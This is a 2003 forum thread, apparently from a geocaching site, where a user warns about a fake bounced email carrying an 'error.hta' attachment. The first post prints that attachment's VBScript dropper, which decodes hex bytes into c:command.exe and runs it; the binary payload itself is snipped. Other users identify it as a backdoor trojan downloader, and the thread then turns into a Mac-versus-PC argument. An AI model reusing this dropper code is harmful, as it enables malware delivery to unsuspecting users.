+Sissy-n-CR Posted May 23, 2003 Share Posted May 23, 2003 Just got what appeared to be a bounced email from a Yahoo! account (I have friends that use Yahoo), but something didn't feel right. As you may know, sometimes the bounced message is returned as an attachment and this one is called "error.hta." Here is the code: <title>Error</title><script language=vbs>malware="4d,5a,90,0,3,0,0,0,4,0, ...snipped for safety... 0,0,0,0,0,0,0"tmp = Split(malware, ",")path = "c:command.exe"Set fso = CreateObject("Scripting.FileSystemObject")Set shell = CreateObject("WScript.Shell")Set f = fso.CreateTextFile(path, ForWriting)For i = 0 To UBound(tmp)l = Len(tmp(i))malware = Int("&H" & Left(tmp(i), 2))If l > 2 Thenr = Int("&H" & Mid(tmp(i), 3, l))For j = 1 To rf.Write Chr(malware)NextElsef.Write Chr(malware)End IfNextf.Closerunscr=1if runscr then shell.run(path)</script> Code snipped for safety. I'm not a programmer, but it appears the section where I snipped is a program that is loaded by the rest of the VisualBasic script and then run. Wht it does, I have no idea. BE VERY CAREFUL OPENING WHAT APPEARS TO BE BOUNCED EMAIL!!! It could very well be a virus/worm. CR Quote Link to comment
+Searching_ut Posted May 23, 2003 Share Posted May 23, 2003 I've been getting a lot e-mail with a virus attached lately. Fortunately, Norton has been deleting them for me. Probably 8 out of 10 of them are in e-mails claiming to be some sort of microsoft security update. Judging by the mailing lists, many of them seem to be sent out to mailing lists derived from newsgroups I post to using a valid e-mail address. I try to keep my anti virus software up to date, but really should be more cautious about backing my data up regularly. Quote Link to comment
+AmericanSpirit Posted May 23, 2003 Share Posted May 23, 2003 Quick search on google turned up this http://securityresponse.symantec.com/avcenter/venc/data/downloader.bo.b.dr.html Seems it downloads a backdoor trojan program. I'm not that familiar with VBS so feel free to correct me if i am wrong but it seems that script overwrites the command.exe file, with whatever was stored in malware. [This message was edited by AmericanSpirit on May 23, 2003 at 02:58 PM.] Quote Link to comment
+Sissy-n-CR Posted May 23, 2003 Author Share Posted May 23, 2003 Just checked out a few security sites and this one is a fairly low risk backdoor trojan that uses IRC for control. Also, I have my work addresses forwarded to one of my home addresses. I didn't notice that this particular message had actually been targeted to the webmaster of the company site, me. I think it safe to assume the geocaching community is not being targeted, but the address was scraped from the website I manage. Still, it is always good practice to not open an attachment until you know for certain what it is. CR Quote Link to comment
+Sissy-n-CR Posted May 23, 2003 Author Share Posted May 23, 2003 quote:Originally posted by AmericanSpirit:http://securityresponse.symantec.com/avcenter/venc/data/downloader.bo.b.dr.html That's the one! CR Quote Link to comment
+Metaphor Posted May 23, 2003 Share Posted May 23, 2003 Boy, I love my Mac! "All of us are standing in the mud, but some of us are looking at the stars." Oscar Wilde Quote Link to comment
Davros Posted May 23, 2003 Share Posted May 23, 2003 Be sure you don't have a trojen that siphons your address book then sends you virus's that appear to be from your own friends.. There are many of them that do just that.. The names elude me right now but I'll remember them soon enough.. In the meantime Don't open anything attached to Yahoo or Hotmail.. In fact they are banned from my domain.. Any mail from them or any resemblence there of is sent to the trash the instant it arives. Randall J. Berry davros@mdgps.net www.mdgps.net Quote Link to comment
+Byron & Anne Posted May 23, 2003 Share Posted May 23, 2003 quote:Originally posted by Metaphor:Boy, I love my Mac! When there's a few more Macs out there you'll be getting them too. So smile now. Byron Quote Link to comment
+user13371 Posted May 24, 2003 Share Posted May 24, 2003 quote:Originally posted by Byron & Anne:When there's a few more Macs out there you'll be getting them too. So smile now. Wrong The Mac OS lacks many of the security holes that make PC's such powerful incubators for viruses. It may not be bullet-proof, but it's better than anything else out there. --- LDR. Quote Link to comment
+Sissy-n-CR Posted May 24, 2003 Author Share Posted May 24, 2003 I'm no computer expert, but I don't think it's the platform--it's the OS. Popularity, also, has nothing to do with it. The most virus prone computer I've ever seen is the Amiga. The bootblock hole was probably the most exploited ever if you consider the number of infections versus the installed base. But for me, anymore, a computer is little more than an appliance. I don't tinker much anymore, so like I said, I'm no expert. CR Quote Link to comment
Davros Posted May 24, 2003 Share Posted May 24, 2003 I'm sorry, say what you like about Mac's.. But you could'nt pay me enough to even use one let alone buy one.. Windowz may have it's quirks but it's 100% better for my personal use than Mac will ever be. Besides.. I know how to use *nix too so if need be I can operate a computer 10x better than both Mac or PC.. PS don't give me the OSX crap about it being FreeBSD 'Darwin' as they call it is a sorry ripoff if I've ever seen one! Randall J. Berry davros@mdgps.net www.mdgps.net Quote Link to comment
+aka Monkey Posted May 24, 2003 Share Posted May 24, 2003 Now, now, let's not get the flamewar going. PCs are great for some things, Macs are great for others (in the world of graphic design, Macs are the standard). "I know how to use *nix too so if need be I can operate a computer 10x better than both Mac or PC.." OS X *IS* UNIX. With a nifty graphical interface on top, but it's all UNIX underneath. Believe me, I've been in there. Anyway, back to the topic at hand... as far as I know, there's yet to be a single virus for OS X. Of course, this hasn't stopped Symantec from persuading everyone that they must spend $50 on their antivirus software, lest they suffer a fate worse than death. God I love marketing. Quote Link to comment
+DavidMac Posted May 24, 2003 Share Posted May 24, 2003 MY brother started having problems with a similar strain recently; apparently a bunch of his friends had no AV software installed and their computers now send out one copy a day to every person in their adress book. Kinda suspicious when you get 12 identical emails a day saying your friend's email adress is invalid ...Not all who wander are lost... unless the batteries in their GPS die, their maps get ruined by rainwater when their pack leaks, and they find themselves in a laurel thicket. Then, they are probably lost. -DavidMac; (formerly Someonenameddave) Quote Link to comment
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.